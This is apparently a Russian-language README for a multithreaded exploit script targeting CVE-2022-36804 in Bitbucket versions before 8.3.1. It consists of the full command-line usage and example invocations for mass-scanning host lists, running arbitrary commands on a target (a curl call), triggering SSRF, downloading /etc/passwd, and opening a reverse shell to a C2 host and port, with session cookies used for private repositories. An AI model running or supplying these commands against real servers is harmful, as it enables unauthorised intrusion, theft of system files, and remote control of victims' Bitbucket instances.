
Многопоточный скрипт эксплойта для CVE-2022-36804, затрагивающий версии BitBucket <8.3.1
Многопоточный эксплойт-скрипт для CVE-2022-36804, затрагивающего (большинство) версий BitBucket <8.3.1. Полное описание уязвимости см. здесь: https://jira.atlassian.com/browse/BSERV-13438
Вся заслуга в обнаружении принадлежит TheGrandPew
Скрипт автоматически обнаруживает публичные репозитории, расположенные на экземплярах Bitbucket, а затем выбирает случайный репозиторий для проверки или эксплуатации уязвимости. Если публичных репозиториев нет, для эксплуатации известных уязвимых экземпляров требуется действительный cookie 'BITBUCKETSESSIONID'.
PoC был разработан для приёма нескольких хостов на входе и передачи уязвимых хостов в stdout, что позволяет направлять результаты по конвейеру для обработки другими инструментами.
Не используйте в злонамеренных целях.
usage: CVE-2022-36804.py [-h] [--auth-cookie AUTH_COOKIE] [--proxy PROXY] [-e {check,rce,ssrf,download,rev_shell}] [--cmd CMD] [--knary KNARY] [--server-file SERVER_FILE] [--host HOST] [--port PORT]
[--skip-check] [-t THREADS] [-v]
repos [repos ...]
CVE-2022-36804 Exploit Script for BitBucket versions < 8.3.1
optional arguments:
-h, --help show this help message and exit
required arguments:
repos Repository host/s (http://bitbucket.example.com:7990) (or single input file "./targets.txt" of target hosts) to perfrom CVE-2022-36804 on
optional arguments:
--auth-cookie AUTH_COOKIE
Authentication cookie 'BITBUCKETSESSIONID' value for private repositories
--proxy PROXY HTTP Proxy: <http/https>://<ip>:<port>
-e {check,rce,ssrf,download,rev_shell}, --exploit {check,rce,ssrf,download,rev_shell}
Exploit to perform
--cmd CMD Command to execute for the 'rce' exploit (curl http://example.com)
--knary KNARY Knary to respond too via DNS for the 'ssrf' exploit
--server-file SERVER_FILE
Server file to download for the 'download' exploit (/etc/passwd)
--host HOST Hostname or IP address of c2 for the 'rev_shell' exploit
--port PORT Port of the c2 for the 'rev_shell' exploit
--skip-check Skip vulnerability checking stage
-t THREADS, --threads THREADS
Worker Threads
-v, --verbose Increase output verbosity level
Одиночный хост
CVE-2022-36804.py http://bitbucket.local:7990/Несколько хостов и передача уязвимых хостов и эксплуатированных репозиториев в файл через конвейер
CVE-2022-36804.py ./bitbucket-hosts.txt > vulnerable-hosts
CVE-2022-36804.py -e rce --cmd "curl http://example.com/" http://bitbucket.local:7990/
Выполняет DNS-запрос к указанному knary
CVE-2022-36804.py -e ssrf --knary http://knary.example.com http://bitbucket.local:7990/
Скачивает репозиторий с целевым файлом
/etc/passwd; сжатый репозиторий будет сохранён под случайным именем файла.
CVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/
CVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/